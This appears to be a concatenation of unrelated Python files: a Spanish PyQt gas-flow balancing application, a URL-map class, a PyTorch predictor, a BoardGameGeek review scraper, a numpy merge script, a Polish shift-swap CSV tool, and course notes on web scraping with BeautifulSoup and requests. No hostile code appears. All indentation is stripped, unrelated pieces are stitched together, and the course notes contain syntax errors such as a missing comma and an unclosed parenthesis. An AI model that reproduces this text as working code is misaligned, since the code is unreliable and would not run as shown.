flujo="x"
else:
flujo=float(flujo)
stream.Flujo(flujo)
stream.Tipo(tipo)
editable=streams[name].editable()
del streams[name]
streams[stream.name]=stream
name=stream.name
streams[name].edit=editable
for spliter in spliters:
#Modificar nombre en los divisores asociados
if name_before in spliters[spliter].entradas:
for entrada in spliters[spliter].entradas:
if name_before==entrada:
spliters[spliter].entradas.remove(name_before)
spliters[spliter].entradas.append(name)
elif name_before in spliters[spliter].salidas:
for salida in spliters[spliter].salidas:
if name_before==salida:
spliters[spliter].salidas.remove(name_before)
spliters[spliter].salidas.append(name)
if dialog.critic_checkable.checkState()==0 and dialog.restriccion_checkable.checkState()==0:
'''Opcion cuando la casilla marcada es "fixed"'''
if dialog.fijar_checkable.checkState()!=0:
state="no variable ni restricción"
minimo="None"
maximo="None"
limits=(minimo,maximo)
streams[name].limits=limits
streams[name].critic=False
streams[name].fixed=True
for i in range(0,len(variables)):
if variables[i]==name:
del variables[i]
break
else:
'''Opcion cuando variable o restriccion esta marcada'''
if dialog.critic_checkable.checkState()!=0 or dialog.restriccion_checkable.checkState()!=0:
minimo=float(dialog.minimo.text())
maximo=float(dialog.maximo.text())
limits=(minimo,maximo)
streams[name].limits=limits
if dialog.critic_checkable.checkState()!=0:
streams[name].critic="variable"
variables.append(streams[name].name)
elif dialog.restriccion_checkable.checkState()!=0:
streams[name].critic="restriccion"
restricciones.append(streams[name].name)
if name_before!=streams[name].name or flujo_before!=streams[name].Flujo:
if tipo=="Corriente":
if name_before!=streams[name].name:
self.updateLog("Corriente "+name_before+", modificada a "+streams[name].name)
if flujo_before!=streams[name].Flujo:
self.updateLog("Flujo de la corriente "+streams[name].name+", modificado a "+str(streams[name].Flujo))
if critic_before!=streams[name].is_critic():
if streams[name].is_critic()==False:
self.updateLog("Corriente "+streams[name].name+", modificada a "+"fija")
else:
self.updateLog("Corriente "+streams[name].name+", modificada a "+str(streams[name].is_critic()))
if limits_before!=streams[name].get_limits():
self.updateLog("Los limites de la corriente "+streams[name].name+" han sido modificados")
elif tipo=="Extraccion":
if name_before!=streams[name].name:
self.updateLog("Extracción "+name_before+", modificada a "+streams[name].name)
if flujo_before!=streams[name].Flujo:
self.updateLog("Flujo de la extracción "+streams[name].name+", modificado a "+str(streams[name].Flujo))
else:
if critic_before!=streams[name].is_critic():
if streams[name].is_critic()==False:
self.updateLog("Corriente "+streams[name].name+", modificada a "+"fija")
else:
self.updateLog("Corriente "+streams[name].name+", modificada a "+str(streams[name].is_critic()))
if limits_before!=streams[name].get_limits():
self.updateLog("Los limites de la corriente "+streams[name].name+" han sido modificados")
flag=False
elif name in spliters:
flag=True
dialog=DivisorWindow(self)
global spliters
if dialog.exec_():
if name==dialog.Nombre.text():
del spliters[name].entradas
del spliters[name].salidas
spliters[name].entradas=dialog.Entradas
spliters[name].salidas=dialog.Salidas
#self.solve_unique(name)
else:
#Si lo que cambio fue el nombre
item.setToolTip("Nombre: "+''+str(dialog.Nombre.text()))
test_name=self.get_itemName(item)
if test_name!=dialog.Nombre.text():
if test_name!="":
dialog.Nombre.setText(test_name)
else:
self.updateLog("<b><Font=red>Error al modificar divisor</font></b>")
spliter=Spliter(dialog.Nombre.text())
spliter.entradas(dialog.Entradas)
spliter.salidas(dialog.Salidas)
del spliters[name]
spliters[dialog.Nombre.text()]=spliter
self.updateLog("Divisor: "+str(spliter.name)+" modificado")
flag=False
def run_all(self):
global streams
self.updateLog("Resolviendo.....")
k=0
j=0
for i in streams:
if streams[i].editable()==False:
if streams[i].is_critic()==False:
streams[i].Flujo="x"
for i in spliters:
spliters[i].status="Unsolved"
while(j<self.max_it):
status_lis=[]
if k==0:
self.updateLog("<b> Itración número: </b>"+str(j+1))
for spliter in spliters:
if spliters[spliter].status!="Solved" and spliters[spliter].status!="Error":
self.solve_unique(spliter,self.tol)
elif spliters[spliter].status=="Error":
j=self.max_it
if k==0:
self.updateLog("<font color=red><b>Se detuvo la iteración debido a que se encontro un error</b></font>")
self.updateLog("Divisor en el que se encunetra el error: "+str(spliter))
for spliter in spliters:
status_lis.append(spliters[spliter].status)
if "Unsolved" in status_lis:
j+=1
if j==self.max_it-1:
self.updateLog("<font color=red><b>Se realizarón "+str(self.max_it)+" iteraciones sin encontrar un resultado</b></font>")
self.updateLog("Estatus de los divisores:")
for spliter in spliters:
if spliters[spliter].status!="Solved":
self.updateLog("Divisor: "+str(spliter)+" "+spliters[spliter].status)
j=self.max_it+10
else:
if k==0:
self.updateLog("<b>Comprobando resultados de la iteración...</b>")
k+=1
j+=1
for spliter in spliters:
inlets=[]
outlets=[]
for i in spliters[spliter].entradas:
inlets.append(streams[i].Flujo)
for i in spliters[spliter].salidas:
outlets.append(streams[i].Flujo)
ans_entradas=0
ans_salidas=0
for i in inlets:
ans_entradas+=i
for i in outlets:
ans_salidas+=i
ans=ans_entradas-ans_salidas
if ans>self.tol:
spliter.status="Error"
j=self.max_it
self.updateLog("<font color=red><b>Se encontro un error en el divisor: "+str(spliter)+"</b></font>")
j=self.max_it+1
else:
self.updateLog("<b><font color=green>Se ha terminado la iteración de manera satisfactoria</font></b>")
j=self.max_it
def importf(self):
if self.filename=="":
path="."
else:
path=self.filename.split("/")
path=path[0:-1]
path="/".join(path)
fname=QFileDialog.getOpenFileName(self,"Balanceador - Open excel file",path,"Oferta y demanda(*.xlsx)")
if fname[0]=="":
return
fname_log=fname[0].split("/")
fname_log=fname_log[-1]
self.updateLog("Importing data from: "+fname_log+".....")
wb=xw.Book(fname[0])
sheet=wb.sheets[1]
#Ciclo para inyecciones
try:
filas=["A","E","I","M","Q"]
for fila in filas:
i=11
b=sheet.range(fila+str(i)).value
while(b!="TOTAL"):
excel_stream=sheet.range(fila+str(i)).value
if fila=="I":
excel_stream="Campo "+excel_stream
if fila=="M":
excel_stream="LNG "+excel_stream
if excel_stream in streams:
if fila=="A":
streams[excel_stream].Flujo=sheet.range("B"+str(i)).value
if fila=="E":
streams[excel_stream].Flujo=sheet.range("F"+str(i)).value
if fila=="I":
streams[excel_stream].Flujo=sheet.range("J"+str(i)).value
if fila=="M":
streams[excel_stream].Flujo=sheet.range("N"+str(i)).value
if fila=="Q":
streams[excel_stream].Flujo=sheet.range("R"+str(i)).value
i+=1
b=sheet.range(fila+str(i)).value
for fila in filas:
i=29
b= b=sheet.range(fila+str(i)).value
while(b!="TOTAL"):
excel_stream=sheet.range(fila+str(i)).value
if excel_stream in streams:
if fila=="A":
streams[excel_stream].Flujo=sheet.range("B"+str(i)).value
if fila=="E":
streams[excel_stream].Flujo=sheet.range("F"+str(i)).value
if fila=="I":
excel_stream=excel_stream
streams[excel_stream].Flujo=sheet.range("J"+str(i)).value
if fila=="M":
streams[excel_stream].Flujo=sheet.range("N"+str(i)).value
if fila=="Q":
streams[excel_stream].Flujo=sheet.range("R"+str(i)).value
i+=1
b=sheet.range(fila+str(i)).value
except KeyError:
pass
for item in self.scene.items():
if isinstance(item,QGraphicsPixmapItem):
self.update_toolTip(item)
self.updateLog("Data imported")
def update_toolTip(self,item):
name=self.get_itemName(item)
if name in streams:
item.setToolTip("Nombre: "+name+"\n Flujo: "+str(streams[name].Flujo))
'''---------------------------------------------------------------------------------------------------'''
'''-----------------Funciones de abrir y guardar-----------------------------------------------------'''
def save(self):
if self.filename=="":
path="."
fname=QFileDialog.getSaveFileName(self,"Balanceador - Save as",path,"Balanceador Files(*.pgd)")
if fname[0]=="":
return
self.filename=fname[0]
self.save_f()
def save_f(self):
fh=None
try:
fh=QFile(self.filename)
if not fh.open(QIODevice.WriteOnly):
raise IOError #str(fh.errorString())
name=self.filename
name=name.split("/")
name=name[-1]
self.updateLog("Saving file.... "+str(name))
self.setWindowTitle("Balanceador del Sistrangas----"+name)
self.scene.clearSelection()
qstream=QDataStream(fh)
qstream.setVersion(QDataStream.Qt_4_2)
qstream.writeInt(len(spliters))
qstream.writeInt(len(streams))
#Guardado de keys
for i in sorted(spliters.keys()):
key=str(i)
qstream.writeQString(key)
for i in sorted(streams.keys()):
key=str(i)
qstream.writeQString(key)
#Guardado status de spliters
for i in sorted(spliters.keys()):
status=str(spliters[i].status)
qstream.writeQString(status)
#Guardado de entradas y salidas de spliters
for i in sorted(spliters.keys()):
qstream.writeInt(len(spliters[i].entradas))
for j in spliters[i].entradas:
qstream.writeQString(str(j))
qstream.writeInt(len(spliters[i].salidas))
for j in spliters[i].salidas:
qstream.writeQString(str(j))
for item in self.scene.items():
name=self.get_itemName(item)
if str(name)==str(spliters[i].name):
spliters[i].Pos=item.pos()
qstream << spliters[i].Pos
#Guardado de info de streams
for i in sorted(streams.keys()):
qstream.writeQString(str(streams[i].name))
qstream.writeQString(str(streams[i].editable()))
qstream.writeQString(str(streams[i].Flujo))
qstream.writeQString(str(streams[i].Tipo))
for item in self.scene.items():
name=self.get_itemName(item)
if str(name)==str(streams[i].name):
streams[i].Pos=item.pos()
qstream << streams[i].Pos
#QStream para items
len_graphics=0
for item in self.scene.items():
if isinstance(item,QGraphicsPixmapItem):
len_graphics+=1
qstream.writeQString(str(len_graphics))
for item in self.scene.items():
self.writeItemToStream_graphics(qstream,item)
for item in self.scene.items():
self.writeItemToStream_Text(qstream,item)
self.updateLog("Saved")
except IOError:
QMessageBox.warning(self,"Balanceador --- Save Error","Failed to save %s: %s"%(self.filename))
finally:
if fh is not None:
fh.close()
def writeItemToStream_Text(self,qstream,item):
if isinstance(item,QGraphicsTextItem):
qstream.writeQString(item.toPlainText())
qstream<<item.pos()<<item.font()
def writeItemToStream_graphics(self,qstream,item):
if isinstance(item,QGraphicsPixmapItem):
name=self.get_itemName(item)
if name in spliters:
tipo="Divisor"
elif name in streams:
tipo=streams[name].Tipo
qstream.writeQString(tipo)
angle=item.rotation()
qstream.writeInt(angle)
qstream << item.pos() <<item.pixmap()
def Open(self):
path=QFileInfo(self.filename).path() \
if not self.filename=="" else "."
fname=QFileDialog.getOpenFileName(self,"Balanceador - Open",path,"Balanceador Files(*.pgd)")
if fname[0]=="":
return
self.filename=fname[0]
name=self.filename
name=name.split("/")
name=name[-1]
self.updateLog("Loading file.... "+str(name))
self.setWindowTitle("Balanceador del Sistranags-----"+str(name))
fh=None
global spliters
global streams
global critic
spliters={}
streams={}
try:
fh=QFile(self.filename)
if not fh.open(QIODevice.ReadOnly):
raise IOError
items=self.scene.items()
while items:
item=items.pop()
self.scene.removeItem(item)
del item
qstream=QDataStream(fh)
qstream.setVersion(QDataStream.Qt_4_2)
len_spliters=0
len_streams=0
key=""
len_spliters=qstream.readInt()
len_streams=qstream.readInt()
keys_spliters=[]
keys_streams=[]
for i in range(0,len_spliters):
key=qstream.readQString()
keys_spliters.append(key)
for i in range(0,len_streams):
key=qstream.readQString()
keys_streams.append(key)
#Parentesis, creación de corrientes y spliters en global dictionaries
for spliter in keys_spliters:
spliter_i=Spliter(spliter)
spliters[spliter]=spliter_i
for stream in keys_streams:
stream_i=Stream(stream)
streams[stream]=stream_i
#Continua carga de datos from qstream
for i in keys_spliters:
status=qstream.readQString()
spliters[i].status=status
for i in keys_spliters:
len_entradas=qstream.readInt()
spliters[i].entradas=[]
spliters[i].salidas=[]
for j in range(0,len_entradas):
entrada=qstream.readQString()
spliters[i].entradas.append(entrada)
len_salidas=qstream.readInt()
for j in range(0,len_salidas):
salida=qstream.readQString()
spliters[i].salidas.append(salida)
position=QPointF()
qstream >> position
spliters[i].Pos=position
for i in keys_streams:
streams[i].name=qstream.readQString()
streams[i].edit=qstream.readQString()
streams[i].Flujo=qstream.readQString()
try:
streams[i].Flujo=float(streams[i].Flujo)
except:
streams[i].Flujo=str(streams[i].Flujo)
streams[i].Tipo=qstream.readQString()
position=QPointF()
qstream >> position
streams[i].Pos=position
len_items=qstream.readQString()
len_items=int(len_items)
for i in range(0,len_items):
self.readItemFromStream(qstream)
while not fh.atEnd():
self.readTextFromStream(qstream)
#Seting tooltips
for item in self.scene.items():
scene_pos=item.pos()
for stream in streams:
if scene_pos==streams[stream].Pos:
item.setToolTip("Nombre: "+streams[stream].name+"\n Flujo: "+str(streams[stream].Flujo))
for spliter in spliters:
if scene_pos==spliters[spliter].Pos:
item.setToolTip("Nombre: "+''+str(spliters[spliter].name))
for stream in streams:
if streams[stream].editable()=="True":
streams[stream].edit=True
if streams[stream].editable()=="False":
streams[stream].edit=False
#Añadiendo corrientes criticas a lista
for stream in streams:
if streams[stream].is_critic()==True:
critic.append(stream)
self.marco()
except IOError:
QMessageBox.warning(self,"Balanceador -- Open Error","Failed to open "+str(self.filename))
finally:
if fh is not None:
fh.close()
self.updateLog("Loaded!")
def readTextFromStream(self,qstream):
text=""
font=QFont()
position=QPointF()
text=qstream.readQString()
qstream>>position>>font
TextItem(text,position,self.scene,font)
def readItemFromStream(self,qstream):
tipo=qstream.readQString()
if tipo!="Pass" and tipo!="":
position=QPointF()
pixmap=QPixmap()
angle=qstream.readInt()
qstream >> position >> pixmap
self.drawItemFromStream(pixmap,position,tipo,angle)
def drawItemFromStream(self,pixmap,position,tipo,angle):
item=graphic_object()
pixmap_in=QPixmap(pixmap)
if tipo!="Divisor":
item.setPixmap(pixmap_in.scaled(200,100))
else:
item.setPixmap(pixmap_in.scaled(200,200))
item.setPos(position)
item.setRotation(angle)
self.scene.clearSelection()
self.scene.addItem(item)
item.setSelected(True)
def new_file(self):
self.filename=""
self.setWindowTitle("Balanceador del Sistrangas-----")
self.updateLog("New file created")
global streams
global spliters
streams={}
spliters={}
items=self.scene.items()
while items:
item=items.pop()
self.scene.removeItem(item)
del item
self.marco()
def save_as(self):
path="."
fname=QFileDialog.getSaveFileName(self,"Balanceador - Save as",path,"Balanceador Files(*.pgd)")
if fname[0]=="":
return
self.filename=fname[0]
self.save_f()
def keyPressEvent(self,event):
if event.key()==Qt.Key_Delete:
print("Exterminate!")
self.delete_item()
'''---------Invocación de main frame-----'''
app=QApplication(sys.argv)
app.setOrganizationName("Cenagas")
#app.setApplicationName("Balance de materia SISTRANGAS")
form=MainWindow()
rect=QApplication.desktop().availableGeometry()
form.resize(float(rect.width()),float(rect.height()*0.9))
form.show()
app.exec_()
|
"""
------------------------------------------------------------------------
URL Map
------------------------------------------------------------------------
Author: bb $kreetz
Email: bbskreets@protonmail.com
__updated__ = "2020-04-12"
------------------------------------------------------------------------
"""
from SETTINGS import *
from CONSTANTS import *
import json
from uuid import uuid4
class urlmap():
def __init__(self):
with open(URL_MAP_PATH, 'r') as fh:
self.map = json.loads(fh.read())
return
def __iter__(self):
for i in self.map:
yield i
def __getitem__(self, item):
return self.map[item]
def add(self, url):
uuid = self._get_uuid()
self.map[uuid] = str(url)
self._save()
return uuid
def _save(self):
with open(URL_MAP_PATH, 'w') as fh:
json.dump(self.map, fh, indent=2)
return
def _get_uuid(self):
uuid = uuid4()
while uuid in self.map.values():
uuid = uuid4()
return str(uuid)
def remove_site(self, uuid):
self.map.pop(uuid)
self._save()
|
from typing import Tuple
import torch
import torch.nn as nn
import torchvision
from omegaconf import DictConfig
from PIL import Image
from src.model import net as Net
from src.utils import load_class
def build_model(model_conf: DictConfig):
return load_class(module=Net, name=model_conf.type, args={"model_config": model_conf})
class Predictor(torch.nn.Module):
def __init__(self, config: DictConfig) -> None:
"""Model Container for Training
Args:
model (nn.Module): model for train
config (DictConfig): configuration with Omegaconf.DictConfig format for dataset/model/runner
"""
super().__init__()
print(f"=======CONFIG=======")
print(config)
print(f"====================")
self.model: nn.Module = build_model(model_conf=config.model)
def forward(self, x):
return self.model.single_inference(x)
def preprocess(self, image: Image):
return torchvision.transforms.ToTensor()(image).unsqueeze(0)
|
# coding: utf-8
# In[3]:
import urllib2, time, random, re
from bs4 import BeautifulSoup, SoupStrainer
import pandas as pd
import requests
# In[157]:
from HTMLParser import HTMLParser
class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
def strip_tags(html):
s = MLStripper()
s.feed(html)
return s.get_data()
# In[39]:
#find all the links given website and append to all_url list. From that list find all the links that end with /boardgame/somedigits
soup = BeautifulSoup(urllib2.urlopen(urllib2.Request("https://boardgamegeek.com/browse/boardgame")).read())
all_url = []
for i in range(1,6):
soup = BeautifulSoup(urllib2.urlopen(urllib2.Request("https://boardgamegeek.com/browse/boardgame/page/" + str(i))).read())
for a in soup.find_all('a', href = True):
all_url.append(a['href'])
board_games = []
for url in all_url:
if re.match('/boardgame/\d+\w+', url):
board_games.append(url)
# In[115]:
board_games = list(set(board_games))
#get the board game ID numbers
board_games_and_nums =[]
nums_only =[]
for b in board_games:
digits = re.search('\d+', b)
last_digit_index = re.search('\d+', b).end()
name_of_game = b[last_digit_index + 1:]
name_of_game = name_of_game.replace('-', ' ')
board_games_and_nums.append([name_of_game.lower(), digits.group(0)])
nums_only.append(digits.group(0))
# In[124]:
games = nums_only[:]
dic ={}
bgn = []
while len(games)>0:
print len(games)
s = ','.join(games[:25])
final_url = 'http://www.boardgamegeek.com/xmlapi/boardgame/' + s + '?comments=1'
print final_url
soup = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_url)).read())
for num in games[:25]:
name_of_game = soup.find('boardgame', {'objectid': num}).find('name', {'primary' : 'true'}).text
name_of_game = name_of_game.lower()
des = soup.find('boardgame', {'objectid': num}).description.text
dic[name_of_game] = {}
dic[name_of_game]['description'] = des
bgn.append([name_of_game, num])
games = games[25:]
# In[125]:
#get the top 5 forums and put in list for later processing later. group everything in dictionary
base_forum_list_url = 'https://www.boardgamegeek.com/xmlapi2/forumlist?id='
base_forum_url = 'https://www.boardgamegeek.com/xmlapi2/forum?id='
for number in bgn:
print 'num', number[1]
final_forum_list_url = base_forum_list_url + number[1] + '&type=thing'
forum_list = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_forum_list_url)).read())
ID = forum_list.find('forum', {'title': 'Reviews'}).get('id')
final_forum_url = base_forum_url + ID + '&sort=hot'
forum = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_forum_url)).read())
all_threads = forum.find_all('thread')
list_of_top_five_threads = []
for thread in all_threads[:5]:
list_of_top_five_threads.append(thread.get('id'))
words_in_top_five_threads = []
thread_base_url = 'https://www.boardgamegeek.com/xmlapi2/thread?id='
for thread_ID in list_of_top_five_threads:
final_thread_url = thread_base_url + thread_ID
thread = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_thread_url)).read())
words_in_top_five_threads.append(thread.find('article').getText())
dic[number[0]]['user_reviews'] = words_in_top_five_threads
# In[133]:
#convert dictionary to dataframe
df = pd.DataFrame.from_dict(dic)
# In[178]:
#function to remove html tags from text
strip = lambda x: strip_tags(x)
# In[192]:
#join the list of reviews into one giant review
for columns in df:
df.loc['user_reviews', columns] = ' '.join(df.loc['user_reviews', columns])
# In[200]:
#remove html tags from all rows and columns
for columns in df:
df.loc['user_reviews', columns] = strip(df.loc['user_reviews', columns])
df.loc['description', columns] = strip(df.loc['description', columns])
# In[203]:
#convert df to csv
dataframe = df.to_csv('board_game_data_frame', sep = ',', encoding = 'utf-8')
|
# Script to combine all the neighborhoods
import numpy as np
import networkx as nx
N = pow(10,6) + pow(10,4)
every_ngbd = [None]*N
for x in range(0,30):
print(x)
chunk_ngbd = np.load('/home/gotmare/network_scan_estimators/mar28_new/N_inactive_10^4/neighborhood_data/ngbd_part_'
+str(x)+'_of_40.npy')
for j in range(len(chunk_ngbd)):
every_ngbd[chunk_ngbd[j][0]] = chunk_ngbd[j]
np.save('every_ngbd_G_10_power_4_2017-03-29-18:48.npy', every_ngbd) |
import csv
class ChosenOne:
def __init__(self, p):
file = open(p, 'r')
self.month = csv.DictReader(file)
self.sd = {}
def get_my_row(self):
for row in self.month:
self.sd = dict(row)
if self.sd['Nazwisko'] == 'Kowalski':
break
return self.sd
def wolne(self):
free = []
for i in self.sd:
if self.sd[i] == "":
free.append(i)
return free
class Changes:
def __init__(self, p1, p2, p3, cls):
self.months = []
self.months.append(csv.DictReader(open(p1)))
self.months.append(csv.DictReader(open(p2)))
self.months.append(csv.DictReader(open(p3)))
self.my_row = cls
self.day = 8 # int(input("insert the day when you wanna make some change: "))
def find_cng(self):
chgs_list = []
if self.my_row[str(self.day)] == 'O':
for i in self.months:
for row in i:
if row[str(self.day)] == '' and row[str(self.day-1)] == '' and row[str(self.day+1)] != 'O':
chgs_list.append(row['Nazwisko'] + " " + row['Imię'])
elif self.my_row[str(self.day)] != ('O', ''):
for i in self.months:
for row in i:
if row[str(self.day)] == '' and row[str(self.day - 1)] == ('O' or '') and row[str(self.day + 1)] == '':
chgs_list.append(row['Nazwisko'] + " " + row['Imię'])
return chgs_list
pth1 = "C:\pliki_py\czerwiec_1.csv"
pth2 = "C:\pliki_py\czerwiec_2.csv"
pth3 = "C:\pliki_py\czerwiec_3.csv"
me = ChosenOne(pth1)
my_chgs = Changes(pth1, pth2, pth3, me.get_my_row())
ex_list = my_chgs.find_cng()
print("your free days: ", *me.wolne())
print("you can make {} change with: {}".format(len(ex_list), ex_list))
|
# from .contenttype import *
from .locale import *
from .company import *
from .auth import *
from .partner import *
from .bank import *
from .module import *
from .sequence import *
from .config import *
from .decimal import *
from .http import *
from .copy import *
|
import numpy
import math
|
# Reading TSV file in pandas
df= pd.read_csv('bestofrt.tsv', sep='\t')
# Webscraping
# Step 1: getting webpage's data
## stored in html (hypertext markup language) format
# downloading html programmatically
import requests
url = 'url'
response = requests.get(url)
# save html to file
with open("... .html", mode='wb') as file:
file.write(response.content)
# to download all 100 files, need to put this in a loop
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.content, 'lxml')
# in this way, we do not save this information on our computer, but working live with response content in computer's memory
# 'lxml' - can use the beautifulsoup html parser, to help work with response content directly
# HTML files in Python
# BeautifulSoup
# import
from bs4 import BeautifulSoup
with open('et-html file') as file:
soup = BeautifulSoup(file, 'lxml') # need to include a parser or we get an error
soup
# let's find the movie's title using the find() method
soup.find('title')
## this results in title of the webpage and not title of the movie
# to get the title only, we will need to do some string slicing
# we can use .contents to return a list of the tag's children
soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
# this finds everything before the ' -', or 18 characters before the end
# \xa0 unicode for non-breaking space
# Gathering quiz:
from bs4 import BeautifulSoup
import os
# looking at title
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
with open(os.path.join(folder, movie_html)) as file: # loops through every file in our rthtml folder
soup = BeautifulSoup(file, 'lxml') # first we need to create the soup, by passing in the file handle
# should specify lxml parser
title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')] # first thing to grab from HTML was title
# we find the contents in the title, we want the first element in title ([0]), and we want to slice off - Rotten Tomatoes
print(title) # print first step
break # (break the loop)
# looking at title and audience score
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
with open(os.path.join(folder, movie_html)) as file:
soup = BeautifulSoup(file, 'lxml')
title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
audience_score = soup.find('div', class_='audience-score meter').find('span').contents[0][:-1]
# we find this within a div class titled "audience-score meter"
# 72% is within the single span tag within the outer most div tag
# we can use soup.find again, but first need to find the div with class audience-score meter
# class needs an underscore under it, because class is a reserved keyword in python
print(audience_score) # let's loop through once, print, and then loop again
break
# we found the audience score, now just need to look in contents, and it is the only item in the span tag so .contents[0]
# we don't want % sign so we will slice it. we want everything in string except last character, so [:-1]
# now grabbing number of audience ratings
# first look at html and find where it says user ratings
# outermost div class is "audience-info hidden-xs superPageFontColor"
# let's zoom in on this using BS
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
with open(os.path.join(folder, movie_html)) as file:
soup = BeautifulSoup(file, 'lxml')
title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
audience_score = soup.find('div', class_='audience-score meter').find('span').contents[0][:-1]
num_audience_ratings = soup.find('div', class_='audience-info hidden-xs superPageFontColor')
num_audience_ratings = num_audience_ratings.find_all('div')[1].contents[2].strip().replace(',', '')
print(num_audience_ratings)
break
# by using the print/break strategy, we can more clearly see what is within this tag
# the user ratings are in the 2nd div tag within the outer div, so lets find all div tags within this outer div, and use the 2nd
# we want the third item in this div, so .contents[2]
# there is white space we want to strip out using python strip function .strip()
# we will need to convert this string to an integer later, and remove comma .replace(',', '')
# now we need to append these to a pandas df
# first we need to import pandas library
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
with open(os.path.join(folder, movie_html)) as file:
soup = BeautifulSoup(file, 'lxml')
title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
audience_score = soup.find('div', class_='audience-score meter').find('span').contents[0][:-1]
num_audience_ratings = soup.find('div', class_='audience-info hidden-xs superPageFontColor')
num_audience_ratings = num_audience_ratings.find_all('div')[1].contents[2].strip().replace(',', '')
df_list.append({'title': title
'audience_score': int(audience_score, # converting string to integer
'number_of_audience_ratings': int(num_audience_ratings)}) # converting string to integer
df = pd.DataFrame(df_list, columns = ['title', 'audience_score', 'number_of_audience_ratings'])
# let's process this cell, which may take some time to run
# great, no errors
# let's look at this dataframe
# Solution Test
# Run the cell below the see if your solution is correct. If an AssertionError is thrown, your solution is incorrect. If no error is thrown, your solution is correct.
df_solution = pd.read_pickle('df_solution.pkl')
df.sort_values('title', inplace = True)
df.reset_index(inplace = True, drop = True)
df_solution.sort_values('title', inplace = True)
df_solution.reset_index(inplace = True, drop = True)
pd.testing.assert_frame_equal(df, df_solution)
# Now we can create the word cloud of Roger Ebert's reviews
# First, downloading files from the internet using Python's requests (HTTP for Humans)
# we will use requests.get to get these files
import requests # import requests library
import os # also import the os library too, see we can store the downloaded file in a folder called ebert reviews
folder_name = 'ebert_reviews'
if not os.path.exists(folder_name):
os.makedirs(folder_name) # this creates folder if it does not already exist
url = 'https://...' # rogert ebert review text file stored on Udacity servers
response = requests.get(url) # we use requests.get on a url and that returns a response
# response # what does response variable look like?
# output: <Response [200]>, this is the http status code for the request has succeeded
# text from text file is currently in our computer's working memory
# it's stored in the body of the response which we can access using .content
response.content
# output: in bytes format, with review text
# we are now going to save this file to our computer
# we want to open a file, by accessing everything after the last slash in the url before .txt
with open(os.path.join(folder_name,
url.split('/')[-1]), mode='wb') as file: # select last item in the list returned
file.write(response.content)
# we need to open this file, which will then write the contents of the response variable too
# we need to open this in wb mode, write binary (mode='wb')
# that's because response.content is in bites, and not text
# then we write to the file handle we have opened: file.write(response.content)
# ^^ That's how you download 1 file programmatically
# Let's check contents of our folder ebert reviews, to make sure the file is there
os.listdir(folder_name)
# output: ['.DS_Store', '11-e.t.-the-extra-terrestrial.txt']
# .DS_Store is a hidden file that stores the attributes of our folder
# Quiz: downloading multiple files from the internet
# In the Jupyter Notebook below, programmatically download all of the Roger Ebert review text files to a folder called ebert_reviews using
# the Requests library. Use a for loop in conjunction with the provided ebert_review_urls list.
import requests
import os
ebert_review_urls = ['many urls here']
folder_name = 'ebert_reviews'
if not os.path.exists(folder_name):
os.makedirs(folder_name)
for url in ebert_review_urls: # then we will get the http response via request.get, on whatever iteration we are currently on in that loop
response = requests.get(url)
with open(os.path.join(folder_name, url.split('/')[-1]), mode = 'wb') as file: # then the bit of code to open a file and write a response.content to that file is the same as above
file.write(response.content) # we will process the cell, took 5 secs
os.listdir(folder_name) # check contents of the folder, there should be 88
len(os.listdir(folder_name)) # check if there are 88
# 12 movies on the top 100 list did not have reviews on roger ebert's site
# Solution Test
import filecmp
dc = filecmp.dircmp('ebert_reviews', 'ebert_reviews_solution')
assert len(dc.common) == 88
# Gathering data from text files
# we have 88 roger ebert reviews to open and read
# we will need a loop to iterate through all of the files in this folder to open and read each
# we can use a library called os and a library called glob
import os
folder = 'ebert_reviews'
for ebert_review in os.listdir(folder):
with open(os.path.join(folder, ebert_review)) as file:
# we have been using os's listdir, which is good if you are sure you want to open every file in the folder
# but let's try using glob instead: allows us to use something called glob patterns to specify sets of file names
# these glob patterns use something called wildcard characters
# focusing on glob.glob, which returns a list of pathnames that match pathname, i.e. string parameter we passed.
# we want all file names ending in txt
import glob
# glob.glob returns a list which we can loop through directly.
for ebert_review in glob.glob('ebert_reviews/*.txt'): # every file in eber_reviews folder, then every file ending in .txt
# * = wildcard for the glob pattern, match any string of any length
print(ebert_review) # prints paths to all files
# we can pass this into the open function in python
import glob
for ebert_review in glob.glob('ebert_reviews/*.txt'):
with open(ebert_review, encoding='utf-8') as file:
print(file.read()) # we would get all text in 1 big chunk
break
# should include encoding. doing so means you get correctly decoded unicode, or an error right away, making this easy to debug
# encoding depends on source of the text, we can inspect source of webpage (write click, view page source) and find encoding is utf-8 (meta charset)
# but we want everything in the first line (title), second line (link), then everything afterwards as separate pieces of data
import glob
for ebert_review in glob.glob('ebert_reviews/*.txt'):
with open(ebert_review, encoding='utf-8') as file:
print(file.readline()[:-1]) # read 1 line, slicing off blank space
break # this gives us just the 1st line of the 1st file, including whitespace (/n, new line character)
# now we want to grab url and full review text
import glob
import pandas as pd
df_list = []
for ebert_review in glob.glob('ebert_reviews/*.txt'):
with open(ebert_review, encoding='utf-8') as file:
title = file.readline()[:-1] # 1st line minus whitespace = title
review_url = file.readline()[:-1]
review_text = file.read() # readlines throws an error when checking the solution, so we use read
# we want to add this into a pandas dataframe, which we can achieve by first creating an empty list, then populate list 1 by 1 as we iterate through the for loop
df_list.append({'title': title,
'review_url': review_url,
'review_text': review_text}) # we will fill this list with dictionaries and this list of dictionaries will later be converted to a pandas df
df = pd.DataFrame(df_list, columns=['title', 'review_url', 'review_text'])
# Solution Test
# Run the cell below the see if your solution is correct. If an AssertionError is thrown, your solution is incorrect. If no error is thrown, your solution is correct.
df_solution = pd.read_pickle('df_solution.pkl')
df.sort_values('title', inplace = True)
df.reset_index(inplace = True, drop = True)
df_solution.sort_values('title', inplace = True)
df_solution.reset_index(inplace = True, drop = True)
